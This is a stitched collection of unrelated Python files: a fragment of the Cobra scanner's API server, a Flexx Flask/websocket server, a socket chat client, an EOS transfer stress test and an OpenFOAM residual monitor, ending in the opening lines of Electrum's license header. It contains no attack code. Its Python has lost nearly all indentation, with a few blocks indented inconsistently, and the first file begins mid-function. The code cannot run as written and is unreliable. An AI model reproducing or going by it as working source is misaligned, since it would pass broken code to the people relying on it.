if not target or target == "":
return {"code": 1002, "result": "URL cannot be empty."}
if not formatter or formatter == '':
formatter = 'json'
if not output or output == '':
output = ''
if not rule or rule == '':
rule = ''
# Report All Id
a_sid = get_sid(target, True)
if isinstance(target, list):
for t in target:
# Scan
arg = (t, formatter, output, rule, a_sid)
producer(task=arg)
result = {
"msg": "Add scan job successfully.",
"sid": a_sid,
}
else:
arg = (target, formatter, output, rule, a_sid)
producer(task=arg)
result = {
"msg": "Add scan job successfully.",
"sid": a_sid,
}
a_sid_data = {
'sids': {}
}
running = Running(a_sid)
# Write a_sid running data
running.list(a_sid_data)
# Write a_sid running status
data = {
'status': 'running',
'report': ''
}
running.status(data)
return {"code": 1001, "result": result}
class JobStatus(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "result": "Only support json, please post json data."}
sid = data.get("sid")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not sid or sid == "":
return {"code": 1002, "result": "sid is required."}
sid = str(data.get("sid")) # 需要拼接入路径,转为字符串
running = Running(sid)
if running.is_file() is not True:
data = {
'code': 1001,
'msg': 'scan id not exist!',
'sid': sid,
'status': 'no such scan',
'report': ''
}
else:
result = running.status()
if result['status'] == 'running':
r_data = running.list()
ret = True
logger.info(r_data['sids'])
for sid, git in r_data['sids'].items():
if Running(sid).is_file(True) is False:
ret = False
if ret:
result['status'] = 'done'
running.status(result)
data = {
'code': 1001,
'msg': 'success',
'sid': sid,
'status': result['status'],
'report': result['report']
}
return data
@app.route('/', methods=['GET', 'POST'])
def summary():
a_sid = request.args.get(key='sid')
if a_sid is None:
return 'No sid specified.'
scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid))
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
if not os.path.isfile(scan_status_file):
return 'No such scan.'
with open(scan_status_file, 'r') as f:
scan_status = json.load(f).get('status')
with open(scan_list_file, 'r') as f:
scan_list = json.load(f).get('sids')
if scan_status == 'running':
return 'Scan job is still running, Please check later.'
start_time = os.path.getctime(filename=scan_status_file)
start_time = time.localtime(start_time)
start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time)
total_targets_number = len(scan_list)
total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0
rule_filter = dict()
for s_sid in scan_list:
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
with open(s_sid_file, 'r') as f:
s_sid_data = json.load(f)
total_vul_number += len(s_sid_data)
for vul in s_sid_data.get('vulnerabilities'):
if 9 <= int(vul.get('level')) <= 10:
critical_vul_number += 1
elif 6 <= int(vul.get('level')) <= 8:
high_vul_number += 1
elif 3 <= int(vul.get('level')) <= 5:
medium_vul_number += 1
elif 1 <= int(vul.get('level')) <= 2:
low_vul_number += 1
try:
rule_filter[vul.get('rule_name')] += 1
except KeyError:
rule_filter[vul.get('rule_name')] = 1
return render_template(template_name_or_list='summary.html',
total_targets_number=total_targets_number,
start_time=start_time,
scan_list=scan_list,
a_sid=a_sid,
total_vul_number=total_vul_number,
critical_vul_number=critical_vul_number,
high_vul_number=high_vul_number,
medium_vul_number=medium_vul_number,
low_vul_number=low_vul_number,
vuls=rule_filter,)
@app.route('/report/<path:a_sid>/<path:s_sid>', methods=['GET'])
def report(a_sid, s_sid):
if s_sid is None:
return 'No sid specified.'
scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
if not os.path.isfile(scan_data_file):
return 'No such target.'
with open(scan_data_file, 'r') as f:
scan_data = json.load(f)
with open(scan_list_file, 'r') as f:
scan_list = json.load(f).get('sids')
with open(os.path.join(os.path.dirname(__file__), 'templates/asset/js/report.js')) as f:
report_js = f.read()
return render_template(template_name_or_list='result.html',
scan_data=json.dumps(scan_data, ensure_ascii=False),
report_js=report_js)
def key_verify(data):
key = Config(level1="cobra", level2="secret_key").value
_key = data.get("key")
if _key == key:
return True
elif not _key or _key == "":
return {"code": 1002, "result": "Key cannot be empty."}
elif not _key == key:
return {"code": 4002, "result": "Key verify failed."}
else:
return {"code": 4002, "result": "Unknown key verify error."}
def start(host, port, debug):
logger.info('Start {host}:{port}'.format(host=host, port=port))
api = Api(app)
api.add_resource(AddJob, '/api/add')
api.add_resource(JobStatus, '/api/status')
# consumer threads
threads = []
for i in range(10):
threads.append(threading.Thread(target=consumer, args=()))
for i in threads:
i.setDaemon(daemonic=True)
i.start()
try:
app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
except socket.error as v:
    if v.errno == errno.EACCES:
        logger.critical('root permission is required to start the API Server!')
        exit()
    else:
        logger.critical('{msg}'.format(msg=v.strerror))
logger.info('API Server start success')
|
_flaskserver.py
|
"""
Serve web page and handle web sockets using Flask.
"""
# Improvements to be done in the future:
# 1) Code from MainHandler, AppHandler and WSHandler should be moved in
# _serverHandlers.py. Only RequestHandler and MyWebSocketHandler
# 2) manager should be overloadable from _flaskserver.py to allow MainHandler,
# AppHandler and WSHandler to place manager tasks in the flexx app loop
# 3) The specification of the backend should be passed at run or start. Not at launch or before.
import json
import time
import asyncio
import socket
import mimetypes
import threading
from urllib.parse import urlparse
import flask
from flask import Flask, request, Blueprint, current_app, url_for
from flask_sockets import Sockets
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from ._app import manager
from ._session import get_page
from ._server import AbstractServer
from ._assetstore import assets
from ._clientcore import serializer
from ._flaskhelpers import register_blueprints, flexxBlueprint, flexxWS
from . import logger
from .. import config
app = Flask(__name__)
# app.debug = True
@app.route('/favicon.ico')
def favicon():
return '' # app.send_static_file(f'img/favicon.ico')
if app.debug:
def has_no_empty_params(rule):
defaults = rule.defaults if rule.defaults is not None else ()
arguments = rule.arguments if rule.arguments is not None else ()
return len(defaults) >= len(arguments)
@app.route("/site-map")
def site_map():
links = []
for rule in current_app.url_map.iter_rules():
# Filter out rules we can't navigate to in a browser
# and rules that require parameters
if "GET" in rule.methods and has_no_empty_params(rule):
url = url_for(rule.endpoint, **(rule.defaults or {}))
links.append((url, rule.endpoint))
# links is now a list of url, endpoint tuples
html = ["<h> URLs served by this server </h>", "<ul>"]
for link in links:
html.append(f'<li><a href="{link[0]}">{link[1]}</a></li>')
html.append("</ul>")
return '\n'.join(html)
@flexxWS.route('/ws/<path:path>')
def ws_handler(ws, path):
# WSHandler
wshandler = WSHandler(ws)
async def flexx_msg_handler(ws, path):
wshandler.open(path)
future = asyncio.run_coroutine_threadsafe(flexx_msg_handler(ws, path), loop=manager.loop)
future.result()
while not ws.closed:
message = ws.receive()
if message is None:
break
manager.loop.call_soon_threadsafe(wshandler.on_message, message)
manager.loop.call_soon_threadsafe(wshandler.ws_closed)
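# Bridging note: ws_handler runs on a gevent worker thread, while the flexx session
# lives in the asyncio loop owned by `manager`. The handshake is therefore pushed into
# that loop with run_coroutine_threadsafe, and every incoming frame is forwarded with
# call_soon_threadsafe so that WSHandler.on_message always executes inside the flexx loop.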
@flexxBlueprint.route('/', defaults={'path': ''})
@flexxBlueprint.route('/<path:path>')
def flexx_handler(path):
# if path.startswith('assets'):
# path = f"flexx/{path}"
# MainHandler
return MainHandler(flask.request).run()
IMPORT_TIME = time.time()
def is_main_thread():
""" Get whether this is the main thread. """
return isinstance(threading.current_thread(), threading._MainThread)
class FlaskServer(AbstractServer):
""" Flexx Server implemented in Flask.
"""
def __init__(self, *args, **kwargs):
global app
self._app = app
self._server = None
self._serving = None # needed for AbstractServer
super().__init__(*args, **kwargs) # this calls self._open and
# create the loop if not specified
def _open(self, host, port, **kwargs):
# Note: does not get called if host is False. That way we can
# run Flexx in e.g. JLab's application.
# Start server (find free port number if port not given)
if port:
# Turn port into int, use hashed port number if a string was given
try:
port = int(port)
except ValueError:
port = port_hash(port)
else:
# Try N ports in a repeatable range (easier, browser history, etc.)
a_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
prefered_port = port_hash('Flexx')
for i in range(8):
port = prefered_port + i
try:
result_of_check = a_socket.bind((host, port))
except:
continue
a_socket.close()
break
else:
assert False, "No port found to start flask"
# Keep flask application info
self._serving = (host, port)
# Remember the loop we are in for the manager
manager.loop = self._loop
# Create a thread-friendly coroutine (especially for Python 3.8)
asyncio.run_coroutine_threadsafe(self._thread_switch(), self._loop)
@staticmethod
async def _thread_switch():
"""
Python 3.8 is very unfriendly to threads, as it does not leave any chance for
a thread switch when no tasks are left to run. This coroutine just gives other
threads some time to run.
"""
while True:
time.sleep(0)
await asyncio.sleep(1e-9) # any number above 0 will keep low CPU usage
def start(self):
# Register blueprints for all apps:
sockets = Sockets(app)
register_blueprints(self._app, sockets)
# Start flask application in background thread
def RunServer():
self._server = pywsgi.WSGIServer(self._serving, self._app, handler_class=WebSocketHandler)
proto = self.protocol
# This string 'Serving apps at' is our 'ready' signal and is tested for.
logger.info('Serving apps at %s://%s:%i/' % (proto, *self._serving))
self._server.serve_forever()
_thread = threading.Thread(target=RunServer)
_thread.daemon = True # end the thread if the main thread exits
_thread.start()
super().start()
def start_serverless(self):
super().start()
def _close(self):
self._server.stop()
@property
def app(self):
""" The Flask Application object being used."""
return self._app
@property
def server(self):
""" The Flask HttpServer object being used."""
return self._server
@property
def protocol(self):
""" Get a string representing served protocol."""
# if self._server.ssl_options is not None:
# return 'https'
return 'http'
def port_hash(name):
""" Given a string, returns a port number between 49152 and 65535
This range (of 2**14 possibilities) is the range for dynamic and/or
private ports (ephemeral ports) specified by iana.org. The algorithm
is deterministic.
"""
fac = 0xd2d84a61
val = 0
for c in name:
val += (val >> 3) + (ord(c) * fac)
val += (val >> 3) + (len(name) * fac)
return 49152 + (val % 2 ** 14)
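# Example: port_hash('Flexx') always maps to the same port in [49152, 65535], which is
# how _open() above picks a repeatable preferred port when none is given; any string
# passed as a port gets its own stable port number the same way.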
class RequestHandler:
def __init__(self, request):
self.request = request
self.content = []
self.values = {}
def redirect(self, location):
return flask.redirect(location)
def write(self, string_or_bytes):
self.content = string_or_bytes
def send_error(self, error_no):
return "Error", error_no
def run(self):
if self.request.method == 'GET':
ret = self.get(request.path)
if ret is not None:
return ret
else:
return self.content, 200, self.values
def get_argument(self, key, default):
return self.request.values.get(key, default)
def set_header(self, key, value):
self.values[key] = value
class AppHandler(RequestHandler):
""" Handler for http requests to get apps.
"""
def get(self, full_path):
logger.debug('Incoming request at %r' % full_path)
ok_app_names = '__main__', '__default__', '__index__'
parts = [p for p in full_path.split('/') if p]
# Try getting regular app name
# Note: invalid part[0] can mean it's a path relative to the main app
app_name = None
path = '/'.join(parts)
if parts:
if path.lower() == 'flexx': # reserved, redirect to other handler
return self.redirect('/flexx/')
if parts[0] in ok_app_names or manager.has_app_name(parts[0]):
app_name = parts[0]
path = '/'.join(parts[1:])
# If it does not look like an app, it might be that the request is for
# the main app. The main app can have sub-paths, but lets try to filter
# out cases that might make Flexx unnecessarily instantiate an app.
# In particular "favicon.ico" that browsers request by default (#385).
if app_name is None:
if len(parts) == 1 and '.' in full_path:
return self.redirect('/flexx/data/' + full_path)
# If we did not return ... assume this is the default app
app_name = '__main__'
# Try harder to produce an app
if app_name == '__main__':
app_name = manager.has_app_name('__main__')
elif '/' not in full_path:
return self.redirect('/%s/' % app_name) # ensure slash behind name
# Maybe the user wants an index? Otherwise error.
if not app_name:
if not parts:
app_name = '__index__'
else:
name = parts[0] if parts else '__main__'
self.write('No app "%s" is currently hosted.' % name)
# We now have:
# * app_name: name of the app, must be a valid identifier, names
# with underscores are reserved for special things like assets,
# commands, etc.
# * path: part (possibly with slashes) after app_name
if app_name == '__index__':
return self._get_index(app_name, path) # Index page
else:
return self._get_app(app_name, path) # An actual app!
def _get_index(self, app_name, path):
if path:
return self.redirect('/flexx/__index__')
all_apps = ['<li><a href="%s/">%s</a></li>' % (name, name) for name in
manager.get_app_names()]
the_list = '<ul>%s</ul>' % ''.join(all_apps) if all_apps else 'no apps'
self.write('Index of available apps: ' + the_list)
def _get_app(self, app_name, path):
# Allow serving data/assets relative to app so that data can use
# relative paths just like exported apps.
if path.startswith(('flexx/data/', 'flexx/assets/')):
return self.redirect('/' + path)
# Get case-corrected app name if the app is known
correct_app_name = manager.has_app_name(app_name)
# Error or redirect if app name is not right
if not correct_app_name:
self.write('No app "%s" is currently hosted.' % app_name)
if correct_app_name != app_name:
return self.redirect('/%s/%s' % (correct_app_name, path))
# Should we bind this app instance to a pre-created session?
session_id = self.get_argument('session_id', '')
if session_id:
# If session_id matches a pending app, use that session
session = manager.get_session_by_id(session_id)
if session and session.status == session.STATUS.PENDING:
self.write(get_page(session).encode())
else:
self.redirect('/%s/' % app_name) # redirect for normal serve
else:
# Create session - websocket will connect to it via session_id
async def run_in_flexx_loop(app_name, request):
session = manager.create_session(app_name, request=request)
return session
future = asyncio.run_coroutine_threadsafe(run_in_flexx_loop(app_name, request=self.request), loop=manager.loop)
session = future.result()
self.write(get_page(session).encode())
class MainHandler(RequestHandler):
""" Handler for assets, commands, etc. Basically, everything for
which the path is clear.
"""
def _guess_mime_type(self, fname):
""" Set the mimetype if we can guess it from the filename.
"""
guess = mimetypes.guess_type(fname)[0]
if guess:
self.set_header("Content-Type", guess)
def get(self, full_path):
logger.debug('Incoming request at %s' % full_path)
# Analyze path to derive components
# Note: invalid app name can mean it's a path relative to the main app
parts = [p for p in full_path.split('/') if p][1:]
if not parts:
self.write('Root url for flexx, missing selector: assets, assetview, data, info or cmd')
return
selector = parts[0]
path = '/'.join(parts[1:])
if selector in ('assets', 'assetview', 'data'):
self._get_asset(selector, path) # JS, CSS, or data
elif selector == 'info':
self._get_info(selector, path)
elif selector == 'cmd':
self._get_cmd(selector, path) # Execute (or ignore) command
else:
self.write('Invalid url path "%s".' % full_path)
def _get_asset(self, selector, path):
# Get session id and filename
session_id, _, filename = path.partition('/')
session_id = '' if session_id == 'shared' else session_id
# Get asset provider: store or session
asset_provider = assets
if session_id and selector != 'data':
self.write('Only supports shared assets, not %r' % filename)
elif session_id:
asset_provider = manager.get_session_by_id(session_id)
# Checks
if asset_provider is None:
self.write('Invalid session %r' % session_id)
if not filename:
self.write('Root dir for %s/%s' % (selector, path))
if selector == 'assets':
# If colon: request for a view of an asset at a certain line
if '.js:' in filename or '.css:' in filename or filename[0] == ':':
fname, where = filename.split(':')[:2]
return self.redirect('/flexx/assetview/%s/%s#L%s' %
(session_id or 'shared', fname.replace('/:', ':'), where))
# Retrieve asset
try:
res = asset_provider.get_asset(filename)
except KeyError:
self.write('Could not load asset %r' % filename)
else:
self._guess_mime_type(filename)
self.write(res.to_string())
elif selector == 'assetview':
# Retrieve asset
try:
res = asset_provider.get_asset(filename)
except KeyError:
self.write('Could not load asset %r' % filename)
else:
res = res.to_string()
# Build HTML page
style = ('pre {display:block; width: 100%; padding:0; margin:0;} '
'a {text-decoration: none; color: #000; background: #ddd;} '
':target {background:#ada;} ')
lines = ['<html><head><style>%s</style></head><body>' % style]
for i, line in enumerate(res.splitlines()):
table = {ord('&'): '&amp;', ord('<'): '&lt;', ord('>'): '&gt;'}
line = line.translate(table).replace('\t', ' ')
lines.append('<pre id="L%i"><a href="#L%i">%s</a> %s</pre>' %
(i + 1, i + 1, str(i + 1).rjust(4).replace(' ', '&nbsp;'), line))
lines.append('</body></html>')
self.write('\n'.join(lines))
elif selector == 'data':
# todo: can/do we async write in case the data is large?
# Retrieve data
res = asset_provider.get_data(filename)
if res is None:
return self.send_error(404)
else:
self._guess_mime_type(filename) # so that images show up
self.write(res)
else:
raise RuntimeError('Invalid asset type %r' % selector)
def _get_info(self, selector, info):
""" Provide some rudimentary information about the server.
Note that this is publicly accessible.
"""
runtime = time.time() - IMPORT_TIME
napps = len(manager.get_app_names())
nsessions = sum([len(manager.get_connections(x))
for x in manager.get_app_names()])
info = []
info.append('Runtime: %1.1f s' % runtime)
info.append('Number of apps: %i' % napps)
info.append('Number of sessions: %i' % nsessions)
info = '\n'.join(['<li>%s</li>' % i for i in info])
self.write('<ul>' + info + '</ul>')
def _get_cmd(self, selector, path):
""" Allow control of the server using http, but only from localhost!
"""
if not self.request.host.startswith('localhost:'):
self.write('403')
return
if not path:
self.write('No command given')
elif path == 'info':
info = dict(address=self.application._flexx_serving,
app_names=manager.get_app_names(),
nsessions=sum([len(manager.get_connections(x))
for x in manager.get_app_names()]),
)
self.write(json.dumps(info))
elif path == 'stop':
asyncio.get_event_loop().stop()
# loop = IOLoop.current()
# loop.add_callback(loop.stop)
self.write("Stopping event loop.")
else:
self.write('unknown command %r' % path)
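# A minimal sketch, not part of the original module, of how the 'info' and 'cmd'
# endpoints above could be exercised from a client. The port and the exact
# '/flexx/info' and '/flexx/cmd/info' paths are assumptions taken from the
# handler code; _get_cmd only honours requests whose Host header starts with
# 'localhost:'.
def _example_query_flexx_info(port):
    import json
    from urllib.request import urlopen
    # publicly accessible HTML summary served by _get_info
    html = urlopen('http://localhost:%d/flexx/info' % port).read().decode()
    # JSON command interface served by _get_cmd (localhost only)
    info = json.loads(urlopen('http://localhost:%d/flexx/cmd/info' % port).read().decode())
    return html, info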
class MessageCounter:
""" Simple class to count incoming messages and periodically log
the number of messages per second.
"""
def __init__(self):
self._collect_interval = 0.2 # period over which to collect messages
self._notify_interval = 3.0 # period on which to log the mps
self._window_interval = 4.0 # size of sliding window
self._mps = [(time.time(), 0)] # tuples of (time, count)
self._collect_count = 0
self._collect_stoptime = 0
self._stop = False
self._notify()
def trigger(self):
t = time.time()
if t < self._collect_stoptime:
self._collect_count += 1
else:
self._mps.append((self._collect_stoptime, self._collect_count))
self._collect_count = 1
self._collect_stoptime = t + self._collect_interval
def _notify(self):
mintime = time.time() - self._window_interval
self._mps = [x for x in self._mps if x[0] > mintime]
if self._mps:
n = sum([x[1] for x in self._mps])
T = self._mps[-1][0] - self._mps[0][0] + self._collect_interval
else:
n, T = 0, self._collect_interval
logger.debug('Websocket messages per second: %1.1f' % (n / T))
if not self._stop:
loop = asyncio.get_event_loop()
loop.call_later(self._notify_interval, self._notify)
def stop(self):
self._stop = True
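# Hypothetical, self-contained illustration of the sliding-window rate estimate
# used by MessageCounter._notify above: messages are bucketed per collect
# interval, and the rate is the bucket sum divided by the window span. Not part
# of the original module.
def _example_window_rate(buckets, collect_interval=0.2):
    # buckets: list of (timestamp, count) tuples, oldest first
    if buckets:
        n = sum(count for _, count in buckets)
        span = buckets[-1][0] - buckets[0][0] + collect_interval
    else:
        n, span = 0, collect_interval
    return n / span
# e.g. _example_window_rate([(0.0, 5), (0.2, 7), (0.4, 6)]) -> 18 / 0.6 = 30.0 msg/s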
from typing import (
TYPE_CHECKING,
cast,
Any,
Optional,
Dict,
Union,
List,
Awaitable,
Callable,
Tuple,
Type,
)
class MyWebSocketHandler():
"""
    This class is designed to mimic the tornado WebSocketHandler so
    that code from WSHandler can be glued in.
"""
class Application:
pass
class IOLoop:
def __init__(self, loop):
self._loop = loop
def spawn_callback(self, func, *args):
self._loop.call_soon_threadsafe(func, *args)
def __init__(self, ws):
self._ws = ws
self.application = MyWebSocketHandler.Application()
self.application._io_loop = MyWebSocketHandler.IOLoop(manager.loop)
self.cookies = {}
def write_message(
self, message: Union[bytes, str, Dict[str, Any]], binary: bool=False
) -> "Future[None]":
self._ws.send(message)
def close(self, code: int=None, reason: str=None) -> None:
if not self._ws.closed:
self._ws.close(code, reason)
def ws_closed(self):
self.on_close()
class WSHandler(MyWebSocketHandler):
""" Handler for websocket.
"""
# https://tools.ietf.org/html/rfc6455#section-7.4.1
known_reasons = {1000: 'client done',
1001: 'client closed',
1002: 'protocol error',
1003: 'could not accept data',
}
# --- callbacks
def open(self, path=None):
""" Called when a new connection is made.
"""
        if not hasattr(self, 'close_code'): # old version of Tornado?
self.close_code, self.close_reason = None, None
self._session = None
self._mps_counter = MessageCounter()
if isinstance(path, bytes):
path = path.decode()
self.app_name = path.strip('/')
logger.debug('New websocket connection %s' % path)
if manager.has_app_name(self.app_name):
self.application._io_loop.spawn_callback(self.pinger1)
else:
self.close(1003, "Could not associate socket with an app.")
# todo: @gen.coroutine?
def on_message(self, message):
""" Called when a new message is received from JS.
This handles one message per event loop iteration.
        We now have a very basic protocol for receiving messages;
        we should at some point define a real, formalized protocol.
"""
self._mps_counter.trigger()
try:
command = serializer.decode(message)
        except Exception as err:
            err.skip_tb = 1
            logger.exception(err)
            return  # nothing to handle if the command could not be decoded
self._pongtime = time.time()
if self._session is None:
if command[0] == 'HI_FLEXX':
session_id = command[1]
try:
self._session = manager.connect_client(self, self.app_name,
session_id,
cookies=self.cookies)
except Exception as err:
self.close(1003, "Could not launch app: %r" % err)
raise
else:
try:
self._session._receive_command(command)
except Exception as err:
err.skip_tb = 1
logger.exception(err)
def on_close(self):
""" Called when the connection is closed.
"""
self.close_code = code = self.close_code or 0
reason = self.close_reason or self.known_reasons.get(code, '')
logger.debug('Websocket closed: %s (%i)' % (reason, code))
self._mps_counter.stop()
if self._session is not None:
manager.disconnect_client(self._session)
self._session = None # Allow cleaning up
def pinger1(self):
""" Check for timeouts. This helps remove lingering false connections.
        This uses the websocket's native ping-pong mechanism. On the
browser side, pongs work even if JS is busy. On the Python side
we perform a check whether we were really waiting or whether Python
was too busy to detect the pong.
"""
self._pongtime = time.time()
self._pingtime = pingtime = 0
while self.close_code is None:
dt = config.ws_timeout
# Ping, but don't spam
if pingtime <= self._pongtime:
self.ping(b'x')
pingtime = self._pingtime = time.time()
iters_since_ping = 0
yield gen.sleep(dt / 5)
# Check pong status
iters_since_ping += 1
if iters_since_ping < 5:
pass # we might have missed the pong
elif time.time() - self._pongtime > dt:
# Delay is so big that connection probably dropped.
# Note that a browser sends a pong even if JS is busy
logger.warning('Closing connection due to lack of pong')
                self.close(1000, 'Connection timed out (no pong).')
return
def on_pong(self, data):
""" Implement the ws's on_pong() method. Called when our ping
is returned by the browser.
"""
self._pongtime = time.time()
# --- methods
def write_command(self, cmd):
assert isinstance(cmd, tuple) and len(cmd) >= 1
bb = serializer.encode(cmd)
try:
self.write_message(bb, binary=True)
except WebSocketClosedError:
self.close(1000, 'closed by client')
def close(self, *args):
super().close(*args)
def close_this(self):
""" Call this to close the websocket
"""
self.close(1000, 'closed by server')
def check_origin(self, origin):
""" Handle cross-domain access; override default same origin policy.
"""
# http://www.tornadoweb.org/en/stable/_modules/tornado/websocket.html
# WebSocketHandler.check_origin
serving_host = self.request.headers.get("Host")
serving_hostname, _, serving_port = serving_host.partition(':')
connecting_host = urlparse(origin).netloc
connecting_hostname, _, connecting_port = connecting_host.partition(':')
serving_port = serving_port or '80'
connecting_port = connecting_port or '80'
if serving_hostname == 'localhost':
return True # Safe
elif serving_host == connecting_host:
return True # Passed most strict test, hooray!
elif serving_hostname == '0.0.0.0' and serving_port == connecting_port:
            return True # host on all addresses; best we can do is check port
elif connecting_host in config.host_whitelist:
return True
else:
logger.warning('Connection refused from %s' % origin)
return False
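# Standalone sketch (a simplification, not part of the module) of the
# same-origin decision implemented in WSHandler.check_origin above: compare the
# Host header against the Origin header's netloc, with special cases for
# localhost, 0.0.0.0 and an explicit whitelist.
def _example_check_origin(serving_host, origin, host_whitelist=()):
    from urllib.parse import urlparse
    serving_hostname, _, serving_port = serving_host.partition(':')
    connecting_host = urlparse(origin).netloc
    connecting_hostname, _, connecting_port = connecting_host.partition(':')
    serving_port = serving_port or '80'
    connecting_port = connecting_port or '80'
    if serving_hostname == 'localhost':
        return True
    if serving_host == connecting_host:
        return True
    if serving_hostname == '0.0.0.0' and serving_port == connecting_port:
        return True
    return connecting_host in host_whitelist
# e.g. _example_check_origin('myapp.io:8080', 'http://myapp.io:8080') -> True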
|
cclient.py
|
import socket,threading,requests,os,json,re
os.system("clear")
port = 2230
unms = raw_input("Name : ")
R = "\x1b[1;31m"
G = "\x1b[1;32m"
Y = "\x1b[1;33m"
B = "\x1b[1;34m"
P = "\x1b[1;35m"
C = "\x1b[1;36m"
W = "\x1b[1;37m"
def tjs(msg,to="public"):
return json.dumps({"msg":msg,"to":to})
class client:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect (("127.0.0.1", port))
print port
s.send(unms)
except socket.error:
exit("Server Error")
def sendmsg(self):
while True:
ab = raw_input(B)
if ab.startswith("!"):
if ab.startswith("!msg "):
fo = re.search("!msg (.*?) (.*)",ab)
to,msg = fo.group(1),fo.group(2)
self.s.send(tjs(msg,to))
continue
else:
self.s.send(tjs(ab,"system"))
continue
self.s.send(tjs(ab))
def __init__(self):
iThread = threading.Thread(target=self.sendmsg)
iThread.daemon = True
iThread.start()
while True:
data = self.s.recv(1024)
if not data:
print ("Server Error")
exit()
jdata = json.loads(data)
print (W+"[{}][{}] : {}".format(R+jdata["from"]+W if jdata["from"] == "system" else P+jdata["from"]+W,Y+"PUBLIC"+W if not jdata["is_private"] else G+"PRIVATE"+W,C+jdata["msg"]+W))
client = client()
client.sendmsg()
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="eonio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission eonio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
monitor.py
|
import sys
sys.path.append(r"/home/anoldfriend/OpenFOAM/anoldfriend-7/utilities/")
import signal
import multiprocessing as mp
import time
from residual_monitor import read_residuals,plot_multiple_residuals,quit
log="run.log"
pressure_name="p_rgh"
nCorrectors=1
interval=10
sample_size=300
# m_residuals=[["h"],["Ux","Uy",pressure_name]]
# m_residuals=[["h"],["Ux",pressure_name]]
m_residuals=[["h","CO2","O2"]]
m_thresholds=[[1e-1,1e-4,1e-5,1e-6,1e-7]]
m_save_files=["residuals1.jpg"]
def process_fun():
line_offset=0
iterations_offset=0
while True:
df,line_offset,iterations,info=read_residuals(log,line_offset,pressure_name,nCorrectors,sample_size)
if "cum_physical_time" in info.keys():
physical_time=info["cum_physical_time"]
else:
physical_time="not found"
if "cum_execution_time" in info.keys():
execution_time=info["cum_execution_time"]
else:
execution_time="not found"
title=f"physical time : {physical_time} s, execution time : {execution_time} s"
titles=[title]*len(m_residuals)
if "latest_delta_time" in info.keys():
delta_time=info["latest_delta_time"]
else:
delta_time= "not found"
if "maxCo" in info.keys():
maxCo=info["maxCo"]
else:
maxCo="not found"
if "meanCo" in info.keys():
meanCo=info["meanCo"]
else:
meanCo="not found"
text=f"latest_delta_time: {delta_time} s \n" + \
f"mean CFL num: {meanCo}\n" + \
f"max CFL num: {maxCo}"
texts=[text]*len(m_residuals)
plot_multiple_residuals(df,iterations_offset,m_residuals,m_thresholds,titles,texts,m_save_files)
iterations_offset+=iterations
time.sleep(interval)
if __name__=="__main__":
try:
signal.signal(signal.SIGINT,quit)
signal.signal(signal.SIGTERM,quit)
        p=mp.Process(target=process_fun)
        p.daemon=True  # must be set before start()
        p.start()
        while True:
            time.sleep(1)  # keep the parent alive for the signal handlers without busy-waiting
except Exception as err:
print(f"Error Message: {err}")
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
